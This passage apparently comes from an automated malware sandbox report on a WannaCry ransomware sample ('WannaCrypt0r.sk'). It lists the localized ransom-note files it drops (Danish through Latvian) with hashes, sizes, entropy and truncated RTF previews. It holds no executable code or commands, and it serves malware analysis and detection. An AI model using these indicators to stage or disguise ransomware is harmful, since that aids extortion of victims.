                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2yG2gv8n8+8zfB8k8F8i8k1Z8M8I818E838C8A8s:Shef3jHd2G26nyMZrS14g
                                                  MD5:537EFEECDFA94CC421E58FD82A58BA9E
                                                  SHA1:3609456E16BC16BA447979F3AA69221290EC17D0
                                                  SHA-256:5AFA4753AFA048C6D6C39327CE674F27F5F6E5D3F2A060B7A8AED61725481150
                                                  SHA-512:E007786FFA09CCD5A24E5C6504C8DE444929A2FAAAFAD3712367C05615B7E1B0FBF7FBFFF7028ED3F832CE226957390D8BF54308870E9ED597948A838DA1137B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_danish.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):37045
                                                  Entropy (8bit):5.028683023706024
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHd02wG2roqni2Jeo75Y3kmA31dv61QyU:Shef3jHd4G2M5bZrS14Q
                                                  MD5:2C5A3B81D5C4715B7BEA01033367FCB5
                                                  SHA1:B548B45DA8463E17199DAAFD34C23591F94E82CD
                                                  SHA-256:A75BB44284B9DB8D702692F84909A7E23F21141866ADF3DB888042E9109A1CB6
                                                  SHA-512:490C5A892FAC801B853C348477B1140755D4C53CA05726AC19D3649AF4285C93523393A3667E209C71C80AC06FFD809F62DD69AE65012DCB00445D032F1277B3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_dutch.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):36987
                                                  Entropy (8bit):5.036160205965849
                                                  Encrypted:false
                                                  SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdp2oG2/CzhReo75Y3kmA31dv61Qyz:Sw3BHSWjHdBG2/UhsZrS14f
                                                  MD5:7A8D499407C6A647C03C4471A67EAAD7
                                                  SHA1:D573B6AC8E7E04A05CBBD6B7F6A9842F371D343B
                                                  SHA-256:2C95BEF914DA6C50D7BDEDEC601E589FBB4FDA24C4863A7260F4F72BD025799C
                                                  SHA-512:608EF3FF0A517FE1E70FF41AEB277821565C5A9BEE5103AA5E45C68D4763FCE507C2A34D810F4CD242D163181F8341D9A69E93FE32ADED6FBC7F544C55743F12
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}

                                                  C:\Users\user\Desktop\msg\m_english.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):36973
                                                  Entropy (8bit):5.040611616416892
                                                  Encrypted:false
                                                  SSDEEP:384:S93BHSj2cguALeT+sPzy3EFHjHdM2EG2YLC7O3eo75Y3kmA31dv61QyW:S93BHSTjHd0G2YLCZrS14y
                                                  MD5:FE68C2DC0D2419B38F44D83F2FCF232E
                                                  SHA1:6C6E49949957215AA2F3DFB72207D249ADF36283
                                                  SHA-256:26FD072FDA6E12F8C2D3292086EF0390785EFA2C556E2A88BD4673102AF703E5
                                                  SHA-512:941FA0A1F6A5756ED54260994DB6158A7EBEB9E18B5C8CA2F6530C579BC4455918DF0B38C609F501CA466B3CC067B40E4B861AD6513373B483B36338AE20A810
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhim

                                                  C:\Users\user\Desktop\msg\m_filipino.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):37580
                                                  Entropy (8bit):5.0458193216786
                                                  Encrypted:false
                                                  SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdi2MG2AGsi6p07i/eo75Y3kmA31dv61QyR:Sw3BHSWjHdGG2Axa7iGZrS14N
                                                  MD5:08B9E69B57E4C9B966664F8E1C27AB09
                                                  SHA1:2DA1025BBBFB3CD308070765FC0893A48E5A85FA
                                                  SHA-256:D8489F8C16318E524B45DE8B35D7E2C3CD8ED4821C136F12F5EF3C9FC3321324
                                                  SHA-512:966B5ED68BE6B5CCD46E0DE1FA868CFE5432D9BF82E1E2F6EB99B2AEF3C92F88D96F4F4EEC5E16381B9C6DB80A68071E7124CA1474D664BDD77E1817EC600CB4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}

                                                  C:\Users\user\Desktop\msg\m_finnish.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):38377
                                                  Entropy (8bit):5.030938473355282
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2oG2l1glOmeo75Y3kmA31dv61QyB:Shef3jHdMG2l1AO3ZrS14l
                                                  MD5:35C2F97EEA8819B1CAEBD23FEE732D8F
                                                  SHA1:E354D1CC43D6A39D9732ADEA5D3B0F57284255D2
                                                  SHA-256:1ADFEE058B98206CB4FBE1A46D3ED62A11E1DEE2C7FF521C1EEF7C706E6A700E
                                                  SHA-512:908149A6F5238FCCCD86F7C374986D486590A0991EF5243F0CD9E63CC8E208158A9A812665233B09C3A478233D30F21E3D355B94F36B83644795556F147345BF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_french.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):38437
                                                  Entropy (8bit):5.031126676607223
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdtW2IG2sjqMeo75Y3kmA31dv61Qyg:Shef3jHd0G2smJZrS14M
                                                  MD5:4E57113A6BF6B88FDD32782A4A381274
                                                  SHA1:0FCCBC91F0F94453D91670C6794F71348711061D
                                                  SHA-256:9BD38110E6523547AED50617DDC77D0920D408FAEED2B7A21AB163FDA22177BC
                                                  SHA-512:4F1918A12269C654D44E9D394BC209EF0BC32242BE8833A2FBA437B879125177E149F56F2FB0C302330DEC328139B34982C04B3FEFB045612B6CC9F83EC85AA9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_german.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):37181
                                                  Entropy (8bit):5.039739267952546
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdN26G2VSA1Ieo75Y3kmA31dv61QyU:Shef3jHdfG2oe1ZrS14w
                                                  MD5:3D59BBB5553FE03A89F817819540F469
                                                  SHA1:26781D4B06FF704800B463D0F1FCA3AFD923A9FE
                                                  SHA-256:2ADC900FAFA9938D85CE53CB793271F37AF40CF499BCC454F44975DB533F0B61
                                                  SHA-512:95719AE80589F71209BB3CB953276538040E7111B994D757B0A24283AEFE27AADBBE9EEF3F1F823CE4CABC1090946D4A2A558607AC6CAC6FACA5971529B34DAC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_greek.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):49044
                                                  Entropy (8bit):4.910095634621579
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdc2oG2WWDFFG5BwKeo75Y3kmA31dv61QyM:Shef3jHdoG2NHG5BwLZrS14Q
                                                  MD5:FB4E8718FEA95BB7479727FDE80CB424
                                                  SHA1:1088C7653CBA385FE994E9AE34A6595898F20AEB
                                                  SHA-256:E13CC9B13AA5074DC45D50379ECEB17EE39A0C2531AB617D93800FE236758CA9
                                                  SHA-512:24DB377AF1569E4E2B2EBCCEC42564CEA95A30F1FF43BCAF25A692F99567E027BCEF4AACEF008EC5F64EA2EEF0C04BE88D2B30BCADABB3919B5F45A6633940CB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_indonesian.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):37196
                                                  Entropy (8bit):5.039268541932758
                                                  Encrypted:false
                                                  SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdY2oG2pq32eo75Y3kmA31dv61Qys:Sw3BHSWjHdUG2pq3nZrS14I
                                                  MD5:3788F91C694DFC48E12417CE93356B0F
                                                  SHA1:EB3B87F7F654B604DAF3484DA9E02CA6C4EA98B7
                                                  SHA-256:23E5E738AAD10FB8EF89AA0285269AFF728070080158FD3E7792FE9ED47C51F4
                                                  SHA-512:B7DD9E6DC7C2D023FF958CAF132F0544C76FAE3B2D8E49753257676CC541735807B4BEFDF483BCAE94C2DCDE3C878C783B4A89DCA0FECBC78F5BBF7C356F35CD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}

                                                  C:\Users\user\Desktop\msg\m_italian.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):36883
                                                  Entropy (8bit):5.028048191734335
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdR2AG2c/EnByeo75Y3kmA31dv61Qy9:Shef3jHdJG2cQZrS14R
                                                  MD5:30A200F78498990095B36F574B6E8690
                                                  SHA1:C4B1B3C087BD12B063E98BCA464CD05F3F7B7882
                                                  SHA-256:49F2C739E7D9745C0834DC817A71BF6676CCC24A4C28DCDDF8844093AAB3DF07
                                                  SHA-512:C0DA2AAE82C397F6943A0A7B838F60EEEF8F57192C5F498F2ECF05DB824CFEB6D6CA830BF3715DA7EE400AA8362BD64DC835298F3F0085AE7A744E6E6C690511
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_japanese.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):81844
                                                  Entropy (8bit):4.85025787009624
                                                  Encrypted:false
                                                  SSDEEP:384:SXZ0j2cKKwd1lksPzy3EFHjHdI2MG275rQeo75Y3kmA31dv61Qyr:SXZ0qbjHd4G2RNZrS14P
                                                  MD5:B77E1221F7ECD0B5D696CB66CDA1609E
                                                  SHA1:51EB7A254A33D05EDF188DED653005DC82DE8A46
                                                  SHA-256:7E491E7B48D6E34F916624C1CDA9F024E86FCBEC56ACDA35E27FA99D530D017E
                                                  SHA-512:F435FD67954787E6B87460DB026759410FBD25B2F6EA758118749C113A50192446861A114358443A129BE817020B50F21D27B1EBD3D22C7BE62082E8B45223FC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f44\fbidi \froman\fcharset129\fprq2{\*\panose 020306000001

                                                  C:\Users\user\Desktop\msg\m_korean.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):91501
                                                  Entropy (8bit):4.841830504507431
                                                  Encrypted:false
                                                  SSDEEP:768:Shef3jHdUG2NQcbxfSVZiG9jvi3//ZVrMQr7pEKCHSI2DsY78piTDtTa6BxzBwdY:SheiaDq
                                                  MD5:6735CB43FE44832B061EEB3F5956B099
                                                  SHA1:D636DAF64D524F81367EA92FDAFA3726C909BEE1
                                                  SHA-256:552AA0F82F37C9601114974228D4FC54F7434FE3AE7A276EF1AE98A0F608F1D0
                                                  SHA-512:60272801909DBBA21578B22C49F6B0BA8CD0070F116476FF35B3AC8347B987790E4CC0334724244C4B13415A246E77A577230029E4561AE6F04A598C3F536C7E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

                                                  C:\Users\user\Desktop\msg\m_latvian.wnry

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                  Category:dropped
                                                  Size (bytes):41169
                                                  Entropy (8bit):5.030695296195755
                                                  Encrypted:false
                                                  SSDEEP:384:SheftipUENLFsPzy3EFHjHdcqH24G2ZN1EDCv3Apb0WD5gYV/S4L3rnzdeo75Y3f:Shef3jHdcMG2NpZrS14F
                                                  MD5:C33AFB4ECC04EE1BCC6975BEA49ABE40
                                                  SHA1:FBEA4F170507CDE02B839527EF50B7EC74B4821F
                                                  SHA-256:A0356696877F2D94D645AE2DF6CE6B370BD5C0D6DB3D36DEF44E714525DE0536
                                                  SHA-512:0D435F0836F61A5FF55B78C02FA47B191E5807A79D8A6E991F3115743DF2141B3DB42BA8BDAD9AD259E12F5800828E9E72D7C94A6A5259312A447D669B03EC44
                                                  Malicious:false
                                                  Reputation:unknown
